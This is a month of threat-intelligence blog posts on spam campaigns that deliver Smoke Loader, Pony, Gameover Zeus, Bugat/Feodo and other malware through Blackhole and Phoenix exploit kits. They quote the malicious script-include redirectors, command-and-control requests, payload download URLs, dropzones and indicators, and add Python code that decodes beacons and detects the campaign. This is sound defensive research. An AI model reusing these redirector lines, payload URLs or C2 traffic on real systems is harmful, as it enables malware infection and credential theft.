Monthly Archives: March 2012

Court Notification

On 2012-03-29 via Cisco’s Security Intelligence Operations, we observed an interesting spam sample with the subject line “Court is aCourt notification”. This spam sample had the following body text,

Notice!

The company “New Balance” has sued you for sending spam.
A copy of the lawsuit is attached to the letter,

Thank you.
U.S. Legal Support

Oh, the irony! A spam sample threatening legal action in response to … spamming!

Anywho, the observed spam sample contained the following malicious attachment:

File: Lawsuit_From_Legal Support_22nd_of_March.exe
Size: 58368
MD5: FC1DCCE6644E425C7C68CCCCBAFCE8B6

This sample installed itself in the following location C:\Documents and Settings\Administrator\Application Data\A11519.exe.

When executed in a lab environment this sample initiated a connectivity check to http://www.google.com. The sample then connected to a command and control server at beaufortseaa139.ru via the following POST request:

POST /qad/index.php HTTP/1.0
User-Agent: Mozilla/4.0
Host: beaufortseaa139.ru
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 20

smk=AmFvZj9lZ3ZlcGNg

This POST request mirrors the traffic pattern seen in our earlier blog American Airlines Ticket Attachment. That's right, this sample is indeed another Smoke Loader variant. Our friends over at the Tracking Cybercrime blog have a good blog post detailing how Smoke Loader is marketed and sold in the underground.

Smoke Loader samples are clearly identifiable by the 'smk=' string observed in the POST data sent to the command and control server. The above POST data smk=AmFvZj9lZ3ZlcGNg is clearly encoded. As established in our earlier blog, this data can be decoded via a two-step process. First the data must be base64 decoded. This step gives us the following output:

AmFvZj9lZ3ZlcGNg >> base64 decodes to >> .aof?egvepc`.

Now, if we take the hex output of our base64 decoding operation we get a result of 02616F663F65677665706360.

Note that the first character of the text output of the decoding operation is '.', i.e. a null character. A null character in hex should be '00'. Since the first byte of our hex output is '02', we can assume that a simple XOR decoding operation with the key 0x02 should reveal the plaintext POST data.

02616F663F65677665706360 >> 0x02 XOR decodes to >> cmd=getgrab

The POST request returns the following encoded file with the following properties:

File: 198
Size: 436228
MD5: ED113B12304243E7F532B370548A2D1C

This encoded file is a grabber designed to steal passwords from various FTP clients, instant messaging clients, mail clients, and web browsers.

This Smoke Loader variant then sends the following data via a POST request to beaufortseaa139.ru/qad/index.php

smk=AmFvZj9lZ3ZxbWFpcSRubWVrbD9DQzE1MTtAQUZHM0A0RzQzMzYxOzU7NUBDMjE3OzExMUNAQzMzNzM7JHJtcHY/MTM7OzU=

Using the same process detailed above we see that this string decodes to:

.cmd=getsocks&login=AA3739BCDE1B6E611439797BA0359333ABA11519&port=31997

This command downloads a SOCKS proxy module.

The next POST to beaufortseaa139.ru/qad/index.php includes the following string:

smk=AmFvZj9lZ3ZubWNmJG5tZWtsP0NDMTUxO0BBRkczQDRHNDMzNjE7NTs1QEMyMTc7MTExQ0BDMzM3MzskcWduPzA6b2MkdGdwPzcsMyRga3ZxPzI=

This decodes to:

.cmd=getload&login=AA3739BCDE1B6E611439797BA0359333ABA11519&sel=28ma&ver=5.1&bits=0

The ‘getload’ command asks the control server how many secondary payloads it should download. The ‘login’ parameter appears to be a unique identifier specific to the particular victim. The ‘sel’ parameter appears to be an identifier for the particular Smoke Loader campaign associated with this spam campaign. The ’28ma’ string likely represents the date of March 28. The ‘ver’ parameter appears to identify the OS of the infected victim.
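The two-step decode above (base64, then single-byte XOR) and the parameter parsing for the later getsocks/getload beacons, written up as an added example that is not from the original post. The key is derived from the first ciphertext byte rather than hard-coded, since the plaintext always starts with a NUL, so this also covers Smoke Loader beacons that use a key other than 0x02; the sample beacons are the three POST bodies quoted in this post.

```python
import base64
import binascii
from urllib.parse import parse_qs

# The three "smk=" POST bodies quoted in this post.
SAMPLE_BEACONS = [
    "smk=AmFvZj9lZ3ZlcGNg",
    "smk=AmFvZj9lZ3ZxbWFpcSRubWVrbD9DQzE1MTtAQUZHM0A0RzQzMzYxOzU7NUBDMjE3OzExMUNAQzMzNzM7JHJtcHY/MTM7OzU=",
    "smk=AmFvZj9lZ3ZubWNmJG5tZWtsP0NDMTUxO0BBRkczQDRHNDMzNjE7NTs1QEMyMTc7MTExQ0BDMzM3MzskcWduPzA6b2MkdGdwPzcsMyRga3ZxPzI=",
]


def decode_smk(body):
    """Decode one Smoke Loader POST body of the form "smk=<base64>".

    Step 1: base64-decode the value.
    Step 2: XOR every byte with a one-byte key. The plaintext begins with a
    NUL byte, so the first ciphertext byte *is* the key (k XOR 0 == k); we
    read it from the data instead of assuming 0x02. Returns (key, plaintext)
    with the leading NUL stripped, or raises ValueError if the body does not
    fit the Smoke Loader pattern.
    """
    if not body.startswith("smk="):
        raise ValueError("not a Smoke Loader beacon (no smk= prefix)")
    try:
        raw = base64.b64decode(body[len("smk="):], validate=True)
    except binascii.Error as exc:
        raise ValueError("smk value is not valid base64") from exc
    if not raw:
        raise ValueError("empty smk value")
    key = raw[0]
    plain = bytes(b ^ key for b in raw)
    if plain[0] != 0 or not plain[1:].isascii():
        raise ValueError("decoded data does not look like a Smoke Loader beacon")
    return key, plain[1:].decode("ascii")


def parse_beacon(body):
    """Return (key, {param: value}) for a decoded beacon, e.g. cmd, login, sel."""
    key, plain = decode_smk(body)
    params = {name: values[0] for name, values in parse_qs(plain).items()}
    return key, params


def is_smoke_loader_beacon(body):
    """Detection helper: True only if the body decodes to a cmd=... beacon."""
    try:
        return "cmd" in parse_beacon(body)[1]
    except ValueError:
        return False


if __name__ == "__main__":
    for beacon in SAMPLE_BEACONS:
        key, params = parse_beacon(beacon)
        print(f"key=0x{key:02x} {params}")
```

Run over proxy or IDS-captured POST bodies, is_smoke_loader_beacon() separates real beacons from form posts that merely happen to contain "smk=".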

The command and control server at beaufortseaa139.ru returns the response 'Smk4', indicating that the victim should download 4 additional files.

The victim then downloads the following files:

http://www.theoldpalmerhouse.com/orderspro/template/images/1.exe
Size: 317952
MD5: 0CAE2FE5AF5AB63A62DD7A2C9E676C5C

http://www.theoldpalmerhouse.com/orderspro/template/images/doc.exe
Size: 599040
MD5: 709CC1AC4D7743E20BB3FB73E7475A78

http://www.maliks.com/images/1.exe
Size: 317952
MD5: 0CAE2FE5AF5AB63A62DD7A2C9E676C5C

http://www.maliks.com/images/doc.exe
Size: 599040
MD5: 709CC1AC4D7743E20BB3FB73E7475A78

Note that the files hosted at theoldpalmerhouse.com and maliks.com are identical. This duplication of effort is likely carried out to increase the chances that these secondary payloads are successfully installed.

The payload doc.exe is a document stealer. It harvests the victim machine for .doc and .xls files. Stolen files are exfiltrated to 91.201.4.62 over port 8000. This is the same IP used in the American Airlines Ticket Attachment post.


Schwab Report

The spam train kept rolling today. We saw another interesting template on 2012-03-29 spoofing communications from Charles Schwab. The observed sample had a subject line of “Schwab Report”.

This malicious missive contained the following links:

http://gorilascountry.com.br/dbcrLxFh/index.html
http://www.chapliniana.com/a1UZ9Deb/index.html

These pages contained the following javascript redirectors:

<script type="text/javascript" src="http://shultzfamily.com/6bCo6tHS/js.js"></script>
<script type="text/javascript" src="http://telefonspass24.de/w2ziooxT/js.js"></script>
<script type="text/javascript" src="http://eawebagency.com.ar/6FtHNTPa/js.js"></script>
<script type="text/javascript" src="http://gpatrol.com/XwWWQjzf/js.js"></script>
<script type="text/javascript" src="http://rregenttours.com/fZAALpHW/js.js"></script>

These JavaScript files redirect victims to a Blackhole Exploit kit at http://88.85.99.44:8080/showthread.php?t=8d80b8c3f87a9538. Note this is the same exploit kit seen in the Apple Store-themed spam campaign.

This kit dropped a Pony downloader with the following properties:

File: contacts.exe
Size: 150569
MD5: 6DD2CB441698AF52A35FDC5388B6C387

This Pony downloader was configured to send stolen FTP credentials to the following dropzones:

http://50.56.208.113:8080/pony/gate.php
http://83.174.131.142:8080/pony/gate.php

The Pony downloader was also configured to download a Gameover Zeus variant from the following locations:

http://roosevelt.edu.ec/rxnUJD.exe
http://harris-tuban-bali.com/ZZKyoGUd.exe

This Gameover Zeus variant had the following properties:

File: rxnUJD.exe
Size: 319528
MD5: 3BD6BD0EE4C2FAF78C23FC41D87FBE5E

Like all recent Zeus variants, this Gameover variant was signed with a self-signed digital certificate.

This Gameover variant had a botid of “rnato30”.

Thank you for your order

On 2012-03-29 we observed an Apple Store-themed spam. The observed sample had a subject line of “Thank you for your order” and the following text:

Dear Customer,

Thank you for shopping at Apple Store.

Here is a notice that your Order Number: W259985718 has been successfully charged to your credit card for 4,200.10 USD.

Please CLICK HERE to see your ORDER.

Your Apple Store Customer Service Team

This email contained a link to www.horizontefc.com.br/y2yMPUY4/index.html. Hmm, that pattern definitely looks familiar, right? It sure is.

Predictably, the malicious link contained the following HTML code with the expected JavaScript redirects:

<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="http://telefonspass24.de/w2ziooxT/js.js"></script>
<script type="text/javascript" src="http://gpatrol.com/XwWWQjzf/js.js"></script>

These javascripts redirected victims to a Blackhole Exploit kit at http://88.85.99.44:8080/showthread.php?t=d7ad916d1c0396ff.

This Blackhole Exploit kit unfortunately included an upgraded Java exploit (CVE-2012-0507). The malicious .jar file dropped by this kit had the following properties:

File: Pol.jar
Size: 14765
MD5: 8E300391CB3011ED76390C021E20F728

The kit then dropped the following Pony downloader:

File: readme.exe
Size: 150569
MD5: C1D691E2FCE076E58463DB5F5DF441CA

The Pony downloader was configured to send stolen FTP credentials to the following dropzones:

http://50.56.208.113:8080/pony/gate.php
http://83.174.131.142:8080/pony/gate.php

The Pony downloader then downloaded a Gameover Zeus variant from the following locations:

http://fragmanist.com/ngjYq.exe
http://genxlogistics.com/wE68.exe

This Zeus variant had the following properties:

Size: 319528
MD5: A374A4151C893BA731833E60655FAD26

This Zeus variant had a botid of “NR29”.

USPS Delivery Confirmation – Failed 64885492

Attachment: UPS_id1086785803.htm

UPS_id1086785803

Encoded JS in the spam attachment redirects the victim to a Phoenix Exploit kit at sisfshsdofhidd[.]ru:8080 /navigator/jueoaritjuir.php hosted at the following IP address(es):

78.83.233.242
125.19.103.198
41.66.137.155
41.168.5.140
61.187.191.16
62.85.27.129
180.235.150.72
202.143.147.35
202.149.85.37
210.56.23.100
210.56.24.226
210.109.108.210
211.44.250.173
216.24.194.2
219.94.194.138

The Phoenix controller then serves a PDF exploiting CVE-2010-0188 from sisfshsdofhidd[.]ru:8080 /navigator/alisgtypezfq.pdf.

This PDF file had the following properties:
Name: alisgtypezfq.pdf
Size: 13,233 bytes
MD5: ed5d2236be495b79d3fcc1d28acaabb0

The PDF exploits CVE-2010-0188 and was detected by 29 of 43 AV vendors on VirusTotal.

Successful exploitation will then redirect victims to phfhshdjsjdppns[.]su:8080 /navigator/frf3.php?i=8. This will download a Bugat/Feodo variant with the following properties:

File: dsarcubqinhsjqkugsbm.exe
MD5: 20de62566248864be3b0e413b332d731
Size: 86,016 bytes
Timestamp: 2011:03:25 06:01:22+01:00

It receives its configuration file from a command and control server at nolwzyzsqkhjkqhomc[.]ru:8080 /rwx/B1_3n9/in/. This domain is hosted on a fast flux infrastructure at the following IP addresses:

74.117.62.130
74.208.14.131
81.30.160.7
83.170.91.152
85.214.204.32
87.204.199.100
88.190.22.72
89.31.145.154
91.121.109.139
94.20.30.91
112.78.124.115
173.224.220.2
199.71.213.72

Note that after almost 3 weeks of sticking to the same URI scheme for the Phoenix landing page and payload page, the Bugat/Feodo spam campaign has now changed URI schemes:

from /images/aublbzdni.php to /navigator/jueoaritjuir.php
from /images/jw.php?i= to /navigator/frf3.php?i=

Your Bill Is Now Available

We saw a return of Verizon Wireless-themed spam today. The sample in question had a subject line of “Your Bill Is Now Available” and was sent from a Cutwail spambot at 86.120.45.80.

This sample had the following malicious links:

casinhajoia.com.br/CvBvr8r9/index.html
coastcruises.com.au/nS9X51yA/index.html
ftp.chirvancontract.gr/K7qjpRQ7/index.html
enil1.home.pl/nS9X51yA/index.html
ftp.bobstudio.com.hk/LgBXz0BV/index.html

These malicious links contained the following html code:

<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="http://colecoesearte.com.br/Kypp5Enk/js.js"></script>
<script type="text/javascript" src="http://rafaeltezelli.com.br/G1GCPjut/js.js"></script>

These javascript redirectors in turn bounced victims to a Blackhole Exploit kit at wildestant.com/showthread.php?t=d7ad916d1c0396ff.

Vulnerable victims directed to the above URL at wildestant.com then downloaded a Pony downloader with the following properties:

File: about.exe
Size: 95785
MD5: 14D9C851566E0C66EF67E2C08E6866A7

This Pony downloader posted stolen FTP credentials to http://88.85.99.44:8080/pony/gate.php. The downloader was also configured to communicate with the following backup dropzones in the event the primary at 88.85.99.44 was unavailable. The backup drops were located at:

http://91.121.140.103:8080/pony/gate.php
http://91.121.178.156:8080/pony/gate.php

The Pony downloader was also configured to download a Gameover Zeus variant from the following locations:

http://gnarlybuys.info/LMbir.exe
http://karinasadvertising.com/vXFEiixu.exe
http://mancomunidadcentro.org.bo/wN7iM.exe
http://100s.pl/jQnoeUC.exe

This Gameover variant had the following properties:

Size: 262696
MD5: B818C5240F3D45A123F2A497ACA8BEA1

This Gameover variant sent stolen data to drop zones at:

188.230.92.97:15043
93.177.168.141:16115

Web injects were downloaded from 93.177.168.141:16115.

Note, we also observed other Blackhole exploit kits at:

184.82.202.46
69.164.199.162


UPS notify!

Subject: UPS notify
Attachment: parcel information.zip
From: PameliaBaffuto@ups.com

UPS notify
The email contained an attachment, parcel information.zip. Within this zip file was an executable with the following properties:

Name: Parcel information.exe
MD5: 0eadfb37c6664ae671d50787bc6b9e28
Size: 47,616 bytes

This payload is identified as a Gamarue downloader, a bot-controlled worm. It injects itself into a new svchost.exe process. It then makes a copy of itself at:
C:\WINDOWS\system32\wuauclt.exe

It adds a registry entry to ensure that the executable runs with each system restart:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
61309 = "C:\WINDOWS\system32\wuauclt.exe"

It then queries A records from Google’s public DNS (at IP address 8.8.4.4) for the domain napasaran[.]ru. This domain is hosted at IP addresses 89.73.38.241, 122.226.120.75, and 46.4.245.38.

The following network traffic is then observed:

POST /and/image.php HTTP/1.1
Host: napasaran.ru
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Connection: close

7fZcUO9fCz1CU4gLIDPydspxXvW8fwi9fj19n/y4Ejx0etSTslkiXgbBYnPNFDZjW/a3dF2ZHHYV88BiixGbWA==

The infected computer then downloads and installs the file napasaran.ru /test.exe. This is the Security Shield rogue AV, with the following properties:

MD5: 6ebb20543e371d72e807a62c897685d5
Size: 349,696 bytes
Timestamp: 2011:10:25 21:34:24+02:00

Security Shield AV

Next, it downloads apartmentsincorfu[.]gr /888.exe. This domain is hosted at 62.1.213.166.
This is a Wibimo spambot with the following properties:

MD5: 4162b8bceb3f4ceb97519f92e54c7f4c
Size: 27,136 bytes
Timestamp: 2011:11:21 11:45:32+01:00

It is installed as:

C:\WINDOWS\system32\ItpurnIfsoyy.dll
MD5: 03142b3993c6f8c530eb2a943173a20b
Size: 13,824 bytes

It connects to a C&C at grabsfakus[.]com:1001. This domain is hosted at 3 IP addresses: 78.159.111.122, 188.72.250.60 and 46.165.199.197. This domain was registered by andpushon@hotmail.com. Other domains registered by the same email address:

– hydroliets.com
– lassogol.com
– aldrorist.com
– vizits-track.com

The spambot immediately began its spam campaign of “Best quality drugs” as shown below:

Subject: BUY NOW VIAGRA CIALIS !!!

USPS – Fast Delivery Shipping 1-4 day USA
Best quality drugs
Fast Shipping USA
Professional packaging
100% guarantee on delivery
Best prices in the market
Discounts for returning customers
FDA approved productas
35000+ satisfied customers

http://fauh.doctorpou.ru

USPS 02193131 delivers Bugat/Feodo

Subject:
DELIVERY CONFIRMATION FROM USPS 02193131
Attachment:
MYUPS_ID3M764824495.htm

USPS 02193131

The spam contained an encoded script which is used to redirect to a Phoenix Exploit kit at rehjsdgfjhskjksd[.]su:8080 /images/aublbzdni.php hosted at the following IP address(es):

78.83.233.242
83.238.208.55
125.19.103.198
41.168.5.140
61.187.191.16
62.85.27.129
199.71.214.180
200.169.13.84
202.143.147.35
202.149.85.37
210.56.23.100
210.56.24.226
210.109.108.210
211.44.250.173
219.94.194.138

First it drops a malicious Flash file downloaded from rehjsdgfjhskjksd[.]su:8080 /images/gogpjljshzjma.swf. This Flash file had the following properties:

File: gogpjljshzjma.swf
Size: 7,785 bytes
MD5: 4ae8dbe82d6340550beee51fd81095d7

This Flash file carries a CVE-2011-0611 exploit and was detected by 15 of 43 AV vendors on VirusTotal.

A malicious PDF file was also downloaded from rehjsdgfjhskjksd[.]su:8080 /images/xoypgqgvxzjudqk4.php. This PDF file had the following properties:

File: xoypgqgvxzjudqk4.php
Size: 13,151 bytes
MD5: 562612faccaab571660837f31f118042

The PDF file carries a CVE-2010-0188 exploit and was detected by 28 of 43 AV vendors on VirusTotal.

If exploitation is successful, the victim is redirected to pobolinovkans[.]su:8080 /images/jw.php?i=15, from which a Bugat/Feodo variant with the following properties is downloaded:

File: gsxohsapcpklkti.exe
MD5: e2149880d462b2bc29969ea1b1101ab0
Size: 88,576 bytes

Bugat/Feodo is installed as C:\Documents and Settings\Administrator\Application Data\KB00090109.exe. It had the following properties:

MD5: a39ec23a671019ee07066c8aa94308cf
Size: 88,576 bytes
Timestamp: 2011:03:25 06:01:22+01:00

This Bugat/Feodo retrieved its configuration file/target list from a command and control server at nolwzyzsqkhjkqhomc[.]ru:8080 /rwx/B1_3n9/in/. This domain is hosted at the following IP addresses on a fast flux infrastructure:

79.101.30.15
94.20.30.91
94.23.30.157
83.170.91.152
85.214.204.32
88.190.22.72
91.121.7.5
91.121.91.111
112.78.124.115
124.124.212.172
173.224.220.224
178.162.154.214

Whack-a-mole

As we noted in our post “Your Bill Is Now Available”, the Blackhole kit used by the Verizon Wireless spam was first located at http://slickcurve.com/showthread.php?t=d7ad916d1c0396ff.

The security research community was quick to spot this domain and have it taken down. Unfortunately, this did not stop the bad guys. Throughout the day we noted that the following Blackhole kits were used:

It appeared that almost as soon as one domain was taken down another domain took its place.

It is interesting to note the common theme used by some of these domains. In particular, the <color>cellular.com/org naming convention.

The domains browncellular.com, cyancellular.com and whitecellular.org were registered on 22-mar-2012.

The domain browncellular.com was registered to:

Renee Fabian clarelam@primasia.com
2840 Center Port Circle
Pompano Beach
FL
33064
US

The domains cyancellular.com and whitecellular.org were registered to the following (note the same email address, clarelam@primasia.com):

jeffrey vaughn
jeffrey vaughn (clarelam@primasia.com)
+1.2524320178 ext
Fax: +1. ext
1000 facet road
henderson, NC
US

The domains slickidian.com and slickcurve.com were both registered on 13-mar-2012 to the following:

Peter Bousun abcdub@hathway.com
40 Frontage Rd
08551 ringoes
United States
Tel: +1.6093970078

Your Bill Is Now Available

Another day and another new spam template. We picked up a Verizon Wireless-themed spam campaign. The sample we studied had the subject line "Your Bill Is Now Available".

The observed spam sample contained the following malicious links:

These pages all contained the following html code:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="http://muttonheadcollective.com/XvLBzokA/js.js"></script>
<script type="text/javascript" src="http://auto-escolas.com/TfFQ7r6J/js.js"></script>
<script type="text/javascript" src="http://rgexcel.com/CPD4MoEs/js.js"></script>
<script type="text/javascript" src="http://turkwebalan.com/oUvuQ0b7/js.js"></script>
<script type="text/javascript" src="http://vita-shop.hu/dSSjc0ag/js.js"></script>
<script type="text/javascript" src="http://wilbrahamweddings.co.uk/qsTCVQXM/js.js"></script>
<script type="text/javascript" src="http://www.bestcar.ee/0AfKWVDW/js.js"></script>
<script type="text/javascript" src="http://www.unimoveis.net/jW57W6aZ/js.js"></script>

During our initial analysis these javascript redirectors bounced victims to a Blackhole Exploit kit at http://slickcurve.com/showthread.php?t=d7ad916d1c0396ff.
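The same "WAIT PLEASE / Loading" landing page with a row of <random-8-chars>/js.js includes shows up in the Schwab, Apple Store, Verizon and Wells Fargo posts in this archive, and the js.js files themselves carry a document.location hop to a showthread.php?t=<16 hex> Blackhole URL. Below is an added triage script, not code from the original posts, that flags both patterns; the HTML and JavaScript samples are constructed to mirror the quoted pages, with the real domains replaced by .example placeholders.

```python
import re
from html.parser import HTMLParser

# Constructed sample mirroring the landing pages quoted in this archive
# (hostnames replaced with .example placeholders).
LANDING_PAGE = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://site-one.example/XvLBzokA/js.js"></script>
<script type="text/javascript" src="http://site-two.example/TfFQ7r6J/js.js"></script>
</html>"""

# Constructed sample of a js.js redirector body, after the one quoted in the
# Wells Fargo post (placeholder hostname, token kept in the same 16-hex shape).
REDIRECTOR_JS = "document.location='http://kit.example/showthread.php?t=d7ad916d1c0396ff';"

# Constructed benign page for comparison.
BENIGN_PAGE = """<html><body><h1>Welcome</h1><p>Our catalogue.</p>
<script src="/static/app.js"></script></body></html>"""

# Eight alphanumerics then js.js, e.g. http://host/XvLBzokA/js.js
JS_INCLUDE_RE = re.compile(r"^https?://[^/]+/[A-Za-z0-9]{8}/js\.js$")
# Blackhole landing URL as seen throughout the archive: showthread.php?t=<16 hex>
BLACKHOLE_URL_RE = re.compile(r"^https?://[^/'\"\s]+/showthread\.php\?t=[0-9a-f]{16}$")
# document.location = '<url>' assignment inside a redirector script
LOCATION_RE = re.compile(r"document\.location\s*=\s*['\"]([^'\"]+)['\"]")


class _Collector(HTMLParser):
    """Collects external script sources and visible text from a page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append(src)

    def handle_data(self, data):
        if data.strip():
            self.text.append(data.strip())


def analyse_landing_page(html):
    """Heuristic: decoy 'please wait' text plus random-dir js.js includes."""
    collector = _Collector()
    collector.feed(html)
    suspicious = [s for s in collector.scripts if JS_INCLUDE_RE.match(s)]
    visible = " ".join(collector.text).lower()
    decoy = "wait please" in visible or "loading" in visible
    return {
        "script_srcs": collector.scripts,
        "suspicious_includes": suspicious,
        "decoy_text": decoy,
        "verdict": bool(suspicious) and decoy,
    }


def extract_blackhole_redirects(js):
    """Return document.location targets that match the Blackhole URL shape."""
    return [url for url in LOCATION_RE.findall(js) if BLACKHOLE_URL_RE.match(url)]
```

Both checks are signatures of this particular campaign's template, so treat a hit as a reason to pull the js.js files and the showthread.php host into blocking, not as proof on its own.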

This kit dropped a Pony downloader with the following properties:

File: info.exe
Size: 118809
MD5: 99FAB94FD824737393F5184685E8EDF2

This Pony downloader hijacked FTP credentials and sent them to the following dropzone: http://176.28.18.135:8080/pony/gate.php. This Pony variant was also configured to send stolen FTP credentials to the following backup dropzones if the primary at 176.28.18.135 was unavailable:

The Pony downloader then grabbed the same Gameover Zeus variant from any of the following locations:

This Gameover Zeus variant had the following properties:

Size: 306712
MD5: 86A548CADA5636B4A8ED7DE5F654FF96

The Gameover Zeus variant was configured to download its configuration file from the following peers via UDP:

27.119.46.174:22985
94.66.81.228:15663
94.203.147.11:20599
94.53.198.35:24596
68.150.204.237:16150
144.122.8.23:16622
99.190.137.80:12109
99.169.224.231:22266
190.26.120.90:22952
201.171.193.38:21552
175.141.221.126:24400
91.179.41.185:15941
79.115.226.238:14247
87.126.224.174:11314
82.131.141.80:27735
72.199.188.132:25142
165.228.237.204:17223
92.241.134.103:26870
151.40.245.8:19197
78.179.68.249:26051

This Zeus variant had a botid of NR22 and sent keylogged data to the following dropzone 84.109.164.131:23440/index.php.

WellsFargo – CEO Portal Statement & Notice Event

Subject:
CEO Portal Statements & Notices Event

URLs:
instafxrebatebandung[.]com/xJgSPZmH/index.html
neelhitech[.]com/qawcXa3B/index.html

WellsFargo-03212012

The text 'View the details of this transaction online' contains hyperlinks to compromised websites, as shown above. These pages contain no content other than the following 5 JavaScript includes:

muzee[.]org/aYYifF1v/js.js
renneaviamentos.com[.]br/u4G9ZTQb/js.js
nowshahr118[.]com/v08jzs2k/js.js
pabloalcalde[.]com/HdU03z00/js.js
posadaeltoreno[.]com/93aHAFsx/js.js

These JavaScript redirectors contain the following document.location statement, which sends victims to a Blackhole Exploit kit at 209.59.217.101:
document.location='hxxp://closteage.com/showthread.php?t=d7ad916d1c0396ff';

It first drops a Pony downloader from the following location:
closteage[.]com /q.php?f=ba33e&e=2

File: readme.exe
MD5: 659382f4192ef5070016b996e94b4646
Size: 283,160 bytes

The Pony downloader posts to its dropzone at 176.28.18.135 /pony/gate.php. It was also configured to download the following 4 files, all of which are the same Gameover Zeus payload:

1. derya34[.]com/M7R7.exe
2. http://www.procontracts.co[.]za/dnhoLD.exe
3. alimujtaba.purelogics[.]info/Jq3v.exe
4. http://www.e-gaming[.]cz/qNrkMGD.exe

It then installs Zeus in %APPDATA% with the following properties:

File: uxnab.exe
MD5: 5d4fabfef89a31dd87834a8d714f1323
Size: 283,160 bytes
Other: This file is digitally signed by ‘5r6Io0OJu3L2’
Company Name: Twain Working Group
File Description: Twain.dll Client’s 32-Bit Thunking Server
File Version: 1,7,0,0
Internal Name: Twunk_32
Original Filename: Twunk_32.exe
Product Name: Twain Thunker
Timestamp: 2011:10:11 15:07:46+02:00

This Gameover Zeus payload exfiltrated stolen data to a dropzone at 188.159.215.128:26650 /index.php.
This payload had a bot id of "NR21" and a cid of "3005". Webinjects were pulled from the same proxy at 87.97.164.223:22005.